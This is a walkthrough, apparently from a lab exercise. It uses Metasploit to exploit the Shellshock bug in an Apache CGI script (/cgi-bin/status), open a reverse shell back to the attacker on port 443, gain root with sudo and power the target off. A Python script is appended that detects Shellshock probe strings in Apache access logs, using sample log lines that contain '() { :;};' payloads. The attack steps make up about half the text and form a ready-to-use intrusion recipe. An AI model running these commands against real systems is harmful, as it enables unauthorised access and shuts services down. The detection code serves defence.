Objective:
Shut down the target machine using Metasploit.
Steps:
- Start msfconsole from a Kali terminal by typing
msfconsole
- Check whether the target machine is vulnerable by using an auxiliary scanner module in msfconsole. Type
use auxiliary/scanner/http/apache_mod_cgi_bash_env
then type
show options
to list the module's options and see which ones are required.
- Among the required options, RHOSTS and TARGETURI need to be filled in. RHOSTS is the target IP address, and TARGETURI is /cgi-bin/status, the CGI script that the command is run through. Type
set RHOSTS target.ip.address
to set RHOSTS, and
set TARGETURI /cgi-bin/status
to set TARGETURI to /cgi-bin/status.
- Now run
id
and
run
to see if the target is vulnerable. If it is, the scanner returns information about the target.
- Now that the target is known to be vulnerable, we load the matching bash exploit module in msfconsole by typing
use exploit/multi/http/apache_mod_cgi_bash_env_exec
then type
show options
to list the module's options and see which ones are required.
- Repeat step 3 by setting RHOSTS and TARGETURI to the target IP address and /cgi-bin/status respectively.
- We need to set the payload that will be sent to a Linux shell over reverse TCP. To do so, type
set payload linux/x86/shell/reverse_tcp
- When we type
show options
it now also shows the payload options and the fields that need to be filled in. LHOST and LPORT need to be set to your machine's IP address, which the payload is sent from and the reverse shell connects back to, and a port on your machine, 443, the port normally used for HTTPS. To do so, type
set LHOST your.ip.address
and
set LPORT 443
- To run the exploit and send the payload to the target machine, type
run
If the connection is successful, a session opens between your local machine and its port, for example 192.168.15.4:443, and the target machine and its port, for example 192.168.15.6:35754.
We can check the connection by typing
ifconfig
to check whether the IP address matches the one shown by msfconsole.
- To shut down the target machine, type
sudo -s
to gain root access.
Then, to shut down the machine, type
poweroff
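
On the server side, requests like the ones these modules send to /cgi-bin/status leave traces in the web server's access log. The following is an added detection example, not part of the original walkthrough: it scans Apache combined-format log lines for the start of a bash function definition, "() {", in the request line, Referer or User-Agent. The log lines are constructed samples, and the assumption that the injected value arrives in one of those three logged fields is the example's own.

```python
import re

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
QUOTED = r'"((?:[^"\\]|\\.)*)"'  # quoted field; Apache escapes embedded quotes as \"
COMBINED = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] ' + QUOTED + r' (\d{3}) \S+ ' + QUOTED + ' ' + QUOTED + r'$'
)
# Start of a bash function definition, "() {", which has no place in these fields.
FUNC_DEF = re.compile(r'\(\)\s*\{')

# Constructed sample lines (not taken from a real server).
SAMPLE_LOG = [
    '192.168.15.9 - - [10/Oct/2023:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 2326 "-" "Mozilla/5.0"',
    '192.168.15.4 - - [10/Oct/2023:13:56:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; echo probe"',
    '192.168.15.4 - - [10/Oct/2023:13:56:09 +0000] "GET /cgi-bin/status HTTP/1.1" 200 0 "() { x; }; echo probe" "Mozilla/5.0"',
    '192.168.15.9 - - [10/Oct/2023:13:57:12 +0000] "GET /cgi-bin/status HTTP/1.1" 200 498 "-" "curl/8.0"',
]


def find_suspicious(lines):
    """Return one dict per request whose request line, Referer or User-Agent contains '() {'."""
    hits = []
    for line in lines:
        m = COMBINED.match(line.strip())
        if m is None:
            continue  # not a combined-format line
        host, when, request, status, referer, agent = m.groups()
        fields = {"request": request, "referer": referer, "user-agent": agent}
        matched = [name for name, value in fields.items() if FUNC_DEF.search(value)]
        if matched:
            parts = request.split()
            hits.append({
                "host": host,
                "time": when,
                "path": parts[1] if len(parts) > 1 else "",
                "status": int(status),
                "fields": matched,
            })
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(hit)
```

A hit with status 200 on a CGI path deserves a closer look than a 404, since the header values only reach bash when a CGI script is actually executed.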